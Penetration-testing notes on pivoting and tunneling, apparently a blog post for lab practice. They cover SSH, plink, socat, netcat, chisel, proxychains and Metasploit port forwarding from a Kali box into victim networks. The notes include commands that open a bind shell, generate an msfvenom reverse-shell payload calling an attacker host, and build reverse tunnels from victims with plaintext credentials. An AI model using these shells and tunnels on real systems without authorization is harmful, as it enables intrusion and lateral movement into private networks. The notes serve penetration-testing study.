#Using SShuttle
sudo sshuttle -r user@10.10.10.10 192.168.1.0/24
Port Forwarding: It is accepting traffic on a given ip address and redirecting
it to different ip and port
Inbound: traffic initiated from outside.
Outbound: traffic initiated from inside.
time nmap -p- portquiz.net | grep -i open
/Helps in checking outbound traffic Open POrts
Example:
--------
a windows XP machine has only 80 and 443 ports have outbound traffic allowed,
but we need to access a server using RDP(3389) in the same network. to access that we need to use port forwarding,
that menas we need an intermediate proxy --> which can be our kali linux machine.
on Kali:
---------- Need to have a Public Address, IDK
vi /etc/rinetd.conf Port Forwarding Utility Config
I
#bindaddress bindport connect address connect port
KALI_Public_IP 80 RDP_Server_address 3389
esc
:wq
/ we set it up to accept traffic from external interface on TCP port 80 and then
redirect to our remote windows server 3389
/etc/init.d/rinetd restart
Copy the KALI_IP (Proxy IP) and run it in windows RDP --> you can access it
RINETD server forwards incoming traffic to the windows 2003 remote desktop service
SSH = Tunnelling & Proxies:
-----------------------------
SSH local Port Forwarding: ssh -L
---------------------------
allows us to connects a local port to a remote port over an encrypte SSH tunnel.
SSH Remote Port Forwarding:
------------------------------
allows us to tunnel a remote port to a local port over an encrypte SSH tunnel.
ON VICTIM Machine:
====================
plink.exe is a SSH client for windows
netstat -an | find "LISTEN" /RDP port is open
/ we would like to access RDP port on this internal non-routable machine
/we can create a reverse ssh tunnel from the victim machine from our attacking box and tunnel out the remote desktop machine from the windows machine and make that port available on my attacking box.
Check for listening ports
netstat -an | find "LISTEN"
From the victim Machine, do a reverse ssh tunnel
Remote Port Forwarding:
--------------------------
on VICTIM Machine:
--------------------
plink -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward
plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389
on KAlI: netstat -antp | grep LISTEN
--------
/we can find 3390 Listening on Kali Machine
rdesktop 127.0.0.1:3390 /Login through RDP using the Remote Tunnel
DYNAMIC PORT FORWARDING:
---------------------------SOCKS4 PROXY
ON Kali:
--------
SSH -D 8080 root@VICTIM_IP /Need pass --> we can login.. and port forwarding port 22 as well
netstat -atnp | grep 8080 /Check if the port is opened or not
nano /etc/proxychains.conf
socks4 127.0.0.1 8080
proxychains nmap -p 3389 -sT -Pn Victim_IP/24 --open /Nmap TCP connect Scan the Victim Ip for RDP
/Proxychains take this traffic and redirects it to the DMZ network(in this case - example), this is slow
proxychains netdiscover -r VICTIM_IP/24
proxychains rdesktop IP_Found_from_Nmap
Port Forwarding using Metasploit:
-----------------------------------
get a meterpreter session first --> Note the IP address of the victim (10.7.0.22)
background
route add 10.7.0.0 255.255.255.0 1
portfwd add -l 445 -p 445 -r 10.7.0.22
Port Forwarding using SoCat: Start a socat listener on Victim_macine2 - Port 8009 & 8080, and listen it on First compromisted machine. From Victim-1 machine: do a port scan as above and port forrward the required ports /Binding the VICTIM-2 ports to Victim-1 Machine so,that we can access it from our Kali machine socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 & socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & netstart -plunt /View the binded ports, we can see 8009 & 8080 in Victim_machine1 Access the Victim-2 Ports on our Kali Machine:on Victim-1 Machine: socat tcp-listen:4321,fork tcp:KALI_IP:4321 &
Port Forwarding using Netcat
nc -l -p $localport -c "nc $remotehost $remoteport"
netcat -nvlp 9001 /Listen on port 9001
netcat -l -p 9001 -e /bin/bash /Create a bash shell on port 9001
netcat -L KALI_IP:80 -p 8902 /Forward local por 9002 to remote port 80
netcat -L kali_IP:80 -p 9002 -x /Port Forward Hex dump
Pivoting from GITHUB
PORT FORWARDING "port to port":
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
Depending on your scope, some of the machines may not be directly accessible. There are systems out there that are dual homed, which allow you to connect into an internal network. You will need to know some of these techniques in order to obtain access into there non-public networks:
- Abatchy’s Port Forwarding Guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide
- Windows Port Forwarding: http://woshub.com/port-forwarding-in-windows/
- SSH Tunneling Explained: https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
- Understanding Proxy Tunnels: https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- Understanding Port forwarding with Metasploit: https://www.offensive-security.com/metasploit-unleashed/portfwd/
- Explore Hidden Networks with Double Pivoting: https://pentest.blog/explore-hidden-networks-with-double-pivoting/
- 0xdf hacks stuff. Pivoting and Tunneling: https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
Tools to help you with Port Forwarding and Pivoting:
- Proxychains: https://github.com/haad/proxychains
- Proxychains-ng: https://github.com/rofl0r/proxychains-ng
- SSHuttle (Totally Recommend learning this): https://github.com/sshuttle/sshuttle
- SSHuttle Documentation: https://sshuttle.readthedocs.io/en/stable/
Vulnerable systems to practice pivoting:
- Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/
Comments
Post a Comment